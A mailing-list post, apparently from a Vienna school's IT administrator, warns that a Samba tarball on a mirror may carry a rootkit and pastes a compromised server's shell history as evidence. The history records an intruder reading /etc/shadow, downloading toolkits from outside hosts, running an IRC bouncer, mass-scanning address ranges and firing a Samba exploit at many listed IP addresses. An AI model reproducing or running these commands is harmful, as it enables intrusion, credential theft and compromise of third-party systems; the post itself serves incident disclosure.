http://ftp.cvut.cz/samba/samba-latest.tar.gz
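AFAICS they are faked and contain some kind of rootkit; you can see this in the shell history below. The server this history comes from has been taken offline for security reasons, and since nobody is there until 7th Jan, I can't give you more details. Note that the history shows the tarball being fetched and built by someone who was already on the machine (they read /etc/shadow before the download), so the tarball on the mirror still needs to be compared against a known-good copy or checksum from the Samba project to confirm that it was altered.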
144 w 145 cat /etc/issue 146 uname -a 147 cat /etc/shadow 148 cd /usr/lib 149 wget http://ftp.cvut.cz/samba/samba-latest.tar.gz 150 5tar zxvf samba-latest.tar.gz 151 tar zxvf samba-latest.tar.gz 152 rm -rf samba-latest.tar.gz 153 cd samba-3.0.0/ 154 cd source/ 155 ./configure 156 ./make 157 ls 158 make 159 w 160 ls 161 cd .. 162 cd .. 163 cd .. 164 cd .. 165 ls 166 cat /etc/shadows 167 cat /etc/shadow 168 cat /etc/hosts 169 cat /proc/cpuinfo 170 socklsit 171 sockslist 172 w 173 killall -9 in.identd 174 killall -9 smbd 175 killall -9 nmbd 176 smbd -D 177 nmbd -D 178 5 locate in.identd 179 locate in.identd 180 cd /var/tmp 181 ls 182 cd .nlp 183 wget geocities.com/st3lly/cmd.tg 184 wget http://geocities.com/st3lly/cmd.tg 185 wget http://geocities.com/st3lly/cmd.tgz 186 tar zxvf cmd.tgz 187 cd cmd 188 ls 189 ./stealth 0 193.95.215.54 6666 6668 190 ./stealth 193.95.215.54 6666 6668 191 ./stealth 193.95.215.54 6667 192 w 193 cd /var/tmp 194 cd .nlp 195 wget http://members.xoom.it/pippo46/selena.tgz 196 wget http://62.211.66.12/pippo46/selena.tgz 197 tar zxvf selena.tgz 198 rm selena 199 rm selena.tgz 200 cd selena/ 201 ls 202 ./assl 212.213 203 uname -a 204 cd var/tmp/.nlp 205 ls 206 cd .nlp 207 cd /var/tmp 208 cd .nlp 209 ls 210 cd /tmp/ 211 cd rk 212 ls 213 wget http://members.xoom.it/vendett/psymag.tar.gz 214 wget http://62.211.66.12/vendett/psymag.tar.gz 215 tar zxvf psymag.tar.gz 216 rm psymag.tar.gz 217 cd psybnc 218 wget http://62.211.66.12/vendett/psybnc.conf 219 ./psybnc 220 cd .. 
221 rm -fr psybnc 222 wget http://62.211.66.12/pippo46/asmb.tar 223 tar zyvf asmb.tar 224 tar zxvf asmb.tar 225 rm asmb.tar 226 cd w00t/ 227 ./asmb 120 228 ./asmb 110 229 ./asmb 217 230 ./asmb 217.229 231 cat woot.log 232 ./samba -b 0 -v 217.229.113.107 233 ./asmb 217.46 234 ./asmb 217.228 235 cd /tmp/rk 236 cd w00t/ 237 ./asmb 194.142 238 ./samba -b 0 -v 194.142.156.50 239 ./asmb 195.165 240 ./asmb 195.240 241 ./asmb 195.80 242 cat woot.log 243 ./samba -b 0 -v 217.229.113.107 244 ./samba -b 0 -v 217.229.203.3 245 ./samba -b 0 -v 217.229.230.36 246 cd /tmp 247 ls 248 cd rk 249 cd w00t/ 250 cat woot.log 251 ./samba -b 0 -v 81.182.126.85 252 ./samba -b 0 -v 81.182.126.85 253 cat woot.log 254 ./samba -b 0 -v 81.182.40.114 255 ./samba -b 0 -v 81.209 256 ./asmb 81.209 257 ./asmb 81.42 258 ./asmb 81.248 259 w 260 cd /var/tmp/.nlp 261 ls 262 cd .. 263 cd rk 264 cd /tmp/rk/.nlp 265 cd /tmp/ 266 cd rk 267 cd .nlp 268 cd w00t/ 269 ./asmb 195.97 270 ./asmb 195.166 271 ./asmb 81.183 272 cat woot.log 273 ./samba -b 0 -v 81.183.0.29 274 ./asmb 81.182 275 cat woot.log 276 ./samba -b 0 -v 81.182.40.114 277 ./samba -b 0 -v 81.182.40.114 278 ./samba -b 0 -v 81.182.40.114 279 ./samba -b 0 -v 81.182.90.152 280 cat woot.log 281 ./samba -b 0 -v 81.183.0.29 282 cat /proc/cpuinfo 283 cat /etc/hosts 284 w 285 cat /etc/issue 286 fuser -v 113/tcp 287 cat /etc/inetd.conf |grep -i ident 288 5vi /etc/inetd.conf 289 vi /etc/inetd.conf 290 vi /etc/inetd.conf 291 5killall -HUP inetd 292 killall -HUP inetd 293 cd /var/tmp 294 ls 295 cd /tmp 296 ls 297 cd rk 298 ls 299 cd .. 
300 cd rk 301 wget http://members.xoom.it/vendett/psymag.tar.gz 302 wget http://62.211.66.12/vendett/psymag.tar.gz 303 tar zxvf psymag.tar.gz 304 ls 305 tar zxf psymag.tar.gz 306 tar zxvf psymag.tar.gz 307 tar xvfz psymag.tar.gz 308 rm psymag.tar.gz 309 ls 310 cd /usr/lib/.nlp 311 cd var/tmp 312 cd /var/tmp 313 ls 314 cd .nlp 315 ls 316 wget http://members.xoom.it/vendett/psymag.tar.gz 317 wget http://62.211.66.12/vendett/psymag.tar.gz 318 tar xvfz psymag.tar.gz 319 tar -xvfz psymag.tar.gz 320 rm psymag.tar.gz 321 w 322 wget http://62.211.66.12/pippo46/psy.tar.gz 323 tar zxvf psy.tar.gz 324 rm psy.tar.gz 325 wget http://62.211.66.12/pippo46/psyBNC2.3.1.tar 326 tar xf psyBNC2.3.1.tar 327 ls 328 cd psybnc. 329 cd psybnc 330 ls 331 wget http://62.211.66.12/pippo46/psybnc.conf 332 ./psybnc 333 ls 334 menuconf 335 ./menuconf 336 ./make 337 cd menuconf 338 ld 339 ld 340 ls 341 cd .. 342 ls 343 make 344 ls 345 ./psybnc 346 vi psybnc.conf 347 ./psybnc 348 vi psybnc.conf 349 ./psybnc 350 vi psybnc.conf 351 ./psybnc 352 cd .. 353 adduser 354 cd /tmo/rk/w00t 355 cd /tmp/rk/w00t 356 ./samba -b 0 -v 193.170.8.129 357 cd /tmp/rk/w00t 358 ./samba -b 0 -v 211.21.64.204 359 ./samba -b 0 -v 211.21.64.204 360 ./samba -b 0 -v 128.210.147.242 361 cd /tmp/rk/w00t 362 ./asmb 128.210 363 ./asmb 128.211 364 ./asmb 128.209 365 ./asmb 128 366 ./asmb 210.86 367 ./asmb 128 368 ./asmb 219 369 ./asmb 219.111 370 ./asmb 219.166 371 cat woot.log 372 ./samba -b 0 -v 219.166.79.186 373 ./samba -b 0 -v 219.166.81.34 374 ./asmb 219.80 375 cat woot.log 376 ./asmb 219.91 377 ./samba -b 0 -v 219.91.104.72 378 ./asmb 211.23 379 ./asmb 212.54 380 ./asmb 212.163 381 ./asmb 212.191 382 cd .. 383 wget xplo.150m.com/allsun.tgz 384 tar zxvf allsun.tgz 385 tar xf allsun.tgz 386 gunzip allsun.tgz 387 cd w00t/ 388 ./asmb 10.12 389 ./asmb 212.37 390 ./asmb 215 391 ./asmb 189 392 ./asmb 140 393 ./asmb 82.129 394 ./asmb 82.39 395 cd /tmp/rk 396 cd w00t/ 397 ./samba -b 0 -v 213.81.174.155 398 cat woot.log 399 cd .. 
400 ls 401 cd w00t/ 402 ./asmb 213.81 403 cd /var/tmp/.nlp 404 cd selena/ 405 ls 406 ./ssx 407 cd /tmp 408 cd rk 409 cd w00t/ 410 ./asmb 210 411 ./asmb 210.146 412 ./asmb 210.192 413 ls 414 ./samba -b 0 -v 128.210.147.242 415 ./samba -b 0 -v 128.210.147.241 416 ./samba -b 0 -v 128.210.147.243 417 ./samba -b 0 -v 128.210.147.241 418 ./samba -b 0 -v 128.210.147.242 419 ./samba -b 0 -v 128.210.147.242 420 ./asmb 210.233 421 ./samba -b 0 -v 210.233.23.147 422 ./asmb 210.59 423 ./asmb 211 424 ./asmb 211.130 425 cat woot.lo 426 ./asmb 211.21 427 cat woot.log 428 ./samba -b 0 -v 211.21.64.204 429 ./asmb 211.22 430 ./asmb 212 431 ./asmb 212.37 432 ./asmb 212.101 433 ./asmb 212.185 434 ./asmb 212.36 435 ./asmb 212.80 436 ./asmb 214 437 ./asmb 158 438 ./asmb 02 439 ./asmb 82 440 ./asmb 82.161 441 ./asmb 82.255 442 cd /tmp/rk/w00t 443 ls 444 ./asmb 83 445 ./asmb 193.40 446 ./asmb 212.28 447 ./asmb 172 448 ./asmb 172.163 449 ./asmb 62.218 450 ./asmb 61.189 451 ./asmb 63 452 ./asmb 62.233 453 ./asmb 62.146 454 ./asmb 62.140 455 ./asmb 62 456 ./asmb 62.174 457 ./asmb 62.32 458 ./asmb 62.57 459 ./asmb 62.90 460 ./asmb 207.44 461 ./asmb 213.64 462 ./asmb 213.52 463 ./asmb 213.60 464 cat woot.log 465 ./samba -b 0 -v 213.60.109.1 466 ./samba -b 0 -v 213.60.109.1 467 wget http://members.xoom.it/pippo46/php.tar 468 tar xf php.tar 469 ls 470 cd php.tar 471 cd .. 
472 cd php.tar 473 wget http://members.xoom.it/pippo46/php.tar 474 tar xf php.tar 475 ls 476 wget http://62.211.66.12/pippo46/php.tar 477 ./Start 62.162 478 ls 479 tar xf php.tar 480 tar zxvf php.tar 481 5http://www.zorgii.0catch.com/phpxpl.tar.gz 482 wget http://www.zorgii.0catch.com/phpxpl.tar.gz 483 tar zxvf phpxpl.tar.gz 484 5gunzip phpxpl.tar.gz 485 gunzip phpxpl.tar.gz 486 cd w00t/ 487 ./asmb 213.61 488 ./samba -b 0 -v 213.60.109.1 489 ./asmb 213.62 490 ./asmb 213.58 491 ./asmb 213.57 492 ./asmb 213.70 493 ./asmb 213.80 494 ./samba -b 0 -v 81.183.0.29 495 w 496 cd /var/tmp 497 cd /tmp/rk 498 cd w00t/ 499 ./samba -b 0 -v 211.22.94.147 500 ./samba -b 0 -v 194.95.226.21
-- \\\ ||| /// _\=/_ ( @ @ ) (o o) +--------oOOo-(_)-oOOo--------------------------oOOo-(_)-oOOo------+ | Markus Schabel TGM - Die Schule der Technik www.tgm.ac.at | | IT-Service A-1200 Wien, Wexstrasse 19-23 net.tgm.ac.at | | [EMAIL PROTECTED] Tel.: +43(1)33126/316 | | [EMAIL PROTECTED] Fax.: +43(1)33126/154 | | FSF Associate Member #597, Linux User #259595 (counter.li.org) | | oOOo Yet Another Spam Trap: oOOo | | ( ) oOOo [EMAIL PROTECTED] ( ) oOOo | +--------\ (----( )--------------------------\ ( -----( )-----+ \_) ) / \_) ) / (_/ (_/
Computers are like airconditioners: They stop working properly if you open windows.